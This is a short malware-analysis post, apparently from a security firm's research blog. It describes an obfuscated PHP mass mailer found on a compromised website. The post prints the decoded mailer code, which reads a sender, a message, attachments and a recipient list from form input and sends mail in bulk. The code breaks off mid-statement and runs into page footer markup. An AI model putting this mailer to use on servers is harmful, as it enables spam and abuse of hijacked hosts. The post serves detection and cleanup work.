While looking at a compromised site, we found an interesting mass mailer in there. The content was encoded using eval/gzinflate and base64_decode:
But when switching the “eval” for “print” we could see the mass mailer hidden and what it was doing:
$secure = “racrewmania@googlemail.com”; @$action=$_POST[‘action’]; @$from=$_POST[‘from’]; @$realname=$_POST[‘realname’]; @$replyto=$_POST[‘replyto’]; @$subject=$_POST[‘subject’]; @$message=$_POST[‘message’]; @$emaillist=$_POST[’emaillist’]; @$file_name=$_FILES[‘file’][‘name’]; @$contenttype=$_POST[‘contenttype’]; @$file=$_FILES[‘file’][‘tmp_name’]; @$amount=$_POST[‘amount’]; set_time_limit(intval($_POST[‘timelimit’])); ..<title>UnixStats Mass MaiLer</title>..for($xx=0; $xx<$amount; $xx++){ for($x=0; $x<$numemails; $x++){ $to = $allemails[$x]; if ($to){ $to = ereg_replace(” “, “”, $to); $message = ereg_replace(“&email&”, $to, $message); $subject = ereg_replace(“&email&”, $to, $subject); print “Sending mail to $to…….”; flush(); $header = “From: $realname <$from>rnReply-To: $replytorn”; $header .= “MIME-Version: 1.0rn”; If ($file_name) $header .= “Content-Type: multipart/mixed; boundary=$uidrn”; If ($file_name) $header .= “–$uidrn”; $header .= “Content-Type: text/$contenttypern”; $header .= “Content-Transfer-Encoding: 8bitrnrn”; $header .= “$messagern”; If ($file_name) $header .= “–$uidrn”; If ($file_name) $header .= “Content-Type: $file_type; name=”$file_name””rn””; If ($file_name) $header .= “”Content-Transfer-Encoding: base64rn””; If ($file_name) $header .= “”Content-Disposition: attachment; filename=””$file_name””rnrn””; If ($file_name) $header .= “”$contentrn””; If ($file_name) $header .= “”–$uid–“”; mail($to</p></div></article></main></div></div><div><nav class=”navigation post-navigation” role=”navigation” aria-label=”Posts”><h2 class=”screen-reader-text”>Post navigation</h2><div class=”nav-links”><div class=”nav-previous”><a href=”https://labs.sucuri.net/flagging-google-com-as-malware/” rel=”prev”>Flagging google.com as malware</a></div><div class=”nav-next”><a href=”https://labs.sucuri.net/strange-htaccess-redirections-to-google-com/” rel=”next”>Strange .htaccess redirections to google.com</a></div></div></nav></div><footer id=”colophon” class=”site-footer”><div class=”site-info”> <a href=”https://wordpress.org/”> Proudly powered by WordPress </a> <span class=”sep”> | </span> Theme: sucurikb by <a href=”http://underscores.me/”>Underscores.me</a>.</div></footer></div><footer id=”sucuri-docs-footer”><div class=”sucuri-docs-footer-container”><div class=”grid-container”><div class=”grid-x grid-margin-x”><div class=”cell large-2″><p class=”sucuri-docs-footer-menu-heading”>PRODUCTS</p><div class=”menu-products-container”><ul id=”menu-products” class=”menu”><li id=”menu-item-595″ class=”menu-item menu-item-type-custom menu-item-object-custom menu-item-595″><a href=”https://sucuri.net/website-firewall/”>Website Firewall</a></li><li id=”menu-item-596″ class=”menu-item menu-item-type-custom menu-item-object-custom menu-item-596″><a href=”https://sucuri.net/website-security-platform/”>Website Antivirus</a></li><li id=”menu-item-597″ class=”menu-item menu-item-type-custom menu-item-object-custom menu-item-597″><a href=”https://sucuri.net/website-backups/”>Website Backups</a></li><li id=”menu-item-598″ class=”menu-item menu-item-type-custom menu-item-object-custom menu-item-598″><a href=”https://sucuri.net/wordpress-security/”>WordPress Security</a></li><li id=”menu-item-599″ class=”menu-item menu-item-type-custom menu-item-object-custom menu-item-599″><a href=”https://sucuri.net/custom/enterprise/”>Enterprise Services</a></li></ul></div></div><div class=”cell large-2″><p class=”sucuri-docs-footer-menu-heading”>SOLUTIONS</p><div class=”menu-solutions-container”><ul id=”menu-solutions” class=”menu”><li id=”menu-item-606″ class=”menu-item menu-item-type-custom menu-item-object-custom menu-item-606″><a href=”https://sucuri.net/website-firewall/ddos-protection”>DDoS Protection</a></li><li id=”menu-item-607″ class=”menu-item menu-item-type-custom menu-item-object-custom menu-item-607″><a href=”https://sucuri.net/website-security-platform/malware-scanning-and-detection”>Malware Detection</a></li><li id=”menu-item-608″ class=”menu-item menu-item-type-custom menu-item-object-custom menu-item-608″><a href=”https://sucuri.net/website-security-platform/malware-removal”>Malware Removal</a></li><li id=”menu-item-609″ class=”menu-item menu-item-type-custom menu-item-object-custom menu-item-609″><a href=”https://sucuri.net/website-firewall/stop-website-attacks-and-hacks”>Malware Prevention</a></li><li id=”menu-item-610″ class=”menu-item menu-item-type-custom menu-item-object-custom menu-item-610″><a href=”https://sucuri.net/website-security-platform/blacklist-removal-and-repair”>Blacklist Removal</a></li></ul></div></div><div class=”cell large-2″><p class=”sucuri-docs-footer-menu-heading”>SUPPORT</p><div class=”menu-support-container”><ul id=”menu-support” class=”menu”><li id=”menu-item-600″ class=”menu-item menu-item-type-custom menu-item-object-custom menu-item-600″><a href=”https://blog.sucuri.net/”>Blog</a></li><li id=”menu-item-601″ class=”menu-item menu-item-type-custom menu-item-object-custom menu-item-601″><a href=”https://kb.sucuri.net/”>Knowledge Base</a></li><li id=”menu-item-602″ class=”menu-item menu-item-type-custom menu-item-object-custom menu-item-602″><a href=”https://sitecheck.sucuri.net/”>SiteCheck</a></li><li id=”menu-item-603″ class=”menu-item menu-item-type-custom menu-item-object-custom menu-item-home menu-item-603″><a href=”https://labs.sucuri.net/”>Research Labs</a></li><li id=”menu-item-604″ class=”menu-item menu-item-type-custom menu-item-object-custom menu-item-604″><a href=”https://sucuri.net/faq”>FAQ</a></li><li id=”menu-item-605″ class=”menu-item menu-item-type-custom menu-item-object-custom menu-item-605″><a href=”https://abuse.sucuri.net/”>Report Abuse</a></li></ul></div></div><div class=”cell large-2″><p class=”sucuri-docs-footer-menu-heading”>COMPANY</p><div class=”menu-company-container”><ul id=”menu-company” class=”menu”><li id=”menu-item-611″ class=”menu-item menu-item-type-custom menu-item-object-custom menu-item-611″><a href=”https://sucuri.net/company”>About</a></li><li id=”menu-item-612″ class=”menu-item menu-item-type-custom menu-item-object-custom menu-item-612″><a href=”https://sucuri.net/company/media”>Media</a></li><li id=”menu-item-613″ class=”menu-item menu-item-type-custom menu-item-object-custom menu-item-613″><a href=”https://sucuri.net/company/events”>Events</a></li><li id=”menu-item-614″ class=”menu-item menu-item-type-custom menu-item-object-custom menu-item-614″><a href=”https://sucuri.net/company/employment”>Employment</a></li><li id=”menu-item-615″ class=”menu-item menu-item-type-custom menu-item-object-custom menu-item-615″><a href=”https://sucuri.net/company/contact-us”>Contact</a></li><li id=”menu-item-616″ class=”menu-item menu-item-type-custom menu-item-object-custom menu-item-616″><a href=”https://sucuri.net/customers/”>Testimonials</a></li></ul></div></div><div class=”cell large-4 text-center”><div class=”footer-social-icons”><ul class=”list-inline”><li class=”list-inline-item”><a class=”p-ft-social-fb” href=”https://www.facebook.com/SucuriSecurity” target=”_blank” rel=”noopener noreferrer”><i class=”social-icon facebook”></i></a></li><li class=”list-inline-item”><a class=”p-ft-social-tw” href=”https://twitter.com/sucurisecurity” target=”_blank” rel=”noopener noreferrer”><i class=”social-icon twitter”></i></a></li><li class=”list-inline-item”><a class=”p-ft-social-ld” href=”https://www.linkedin.com/company/899487″ target=”_blank” rel=”noopener noreferrer”><i class=”social-icon linkedin”></i></a></li><li class=”list-inline-item”><a class=”p-ft-social-ig” href=”https://www.instagram.com/sucurisecurity/” target=”_blank” rel=”noopener noreferrer”><i class=”social-icon instagram”></i></a></li></ul></div><div><p><a href=”https://dashboard.sucuri.net/login/” class=”btn login mp-ft-login auto-track” data-gatrack=”Button_Click, Footer_Login”>Customer Login</a></p></div><div class=”footer-logo-wrapper”> <a href=”/” class=”footer-logo”></a></div></div></div></div><div class=”grid-container sucuri-docs-footer-b”><hr><div class=”grid-x grid-margin-x”><div class=”cell medium-8 large-8″><ul class=”list-inline unstyled-list”><li class=”list-inline-item”><a class=”mp-ft-copyright-terms auto-track” data-gatrack=”Button_Click, Footer_Terms_Of_Use” href=”/terms-of-service”>Terms of Use</a></li><li class=”list-inline-item”><a class=”mp-ft-copyright-priv auto-track” data-gatrack=”Button_Click, Footer_Privacy_Policy” href=”/privacy-policy”>Privacy Policy</a></li><li class=”list-inline-item”><a class=”mp-ft-copyright-faq auto-track” data-gatrack=”Button_Click, Footer_FAQ” href=”/faq”>Frequently Asked Questions</a></li></ul></div><div class=”cell medium-4 large-4 copyright text-center”><p>© 2020 Sucuri Inc. All rights reserved.</p></div></div></div></div></footer> <script src=”https://labs.sucuri.net/wp-content/cache/min/1/7a7f2154ed98976f1f4d0d6faaeb245e.js” data-minify=”1″></script></body></html></p>